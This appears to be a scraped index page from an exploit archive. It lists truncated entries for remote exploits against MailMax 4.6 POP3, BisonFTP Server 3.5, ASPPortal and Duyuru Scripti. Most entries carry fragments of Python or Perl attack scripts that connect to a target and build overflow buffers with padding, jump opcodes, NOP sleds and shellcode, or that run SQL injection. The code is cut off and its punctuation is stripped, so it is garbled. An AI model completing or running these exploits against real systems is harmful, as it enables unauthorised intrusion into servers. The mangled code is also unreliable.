MailMax-4.6-POP3-

MailMax v4.6 POP3 "USER" Remote Buffer Overflow Exploit No Login Needed Newer version's not tested, maybe vulnerable too A hard one this, the shellcode MUST be lowercase. Plus there are many opcode's that break the payload and opcodes that gets changed, like "\xc3" gets converted to "\xe3", and...

Duyuru Scripti Goster.ASP SQL injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/22910/info Duyuru Scripti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. Exploiting this vulnerability could permit remot...

MailMax 4.6 POP3 Buffer Overflow

!/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffer += "\xEB\x06\x90\x90" Short jmp 6 bytes buffe...

BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow

!/usr/bin/python BisonFTP Server \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 padding buffer = "\x90" 1092 368 bytes shellcode buffer +=...

ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================ ASPPortal use IO::Socket; use Math::BigInt; if@ARGV != 3 usage; else exploit; sub header print "\n- NukedX Security Advisory Nr.2006-21\r\n"; print "- ASPPortal \r\n"; print "- -...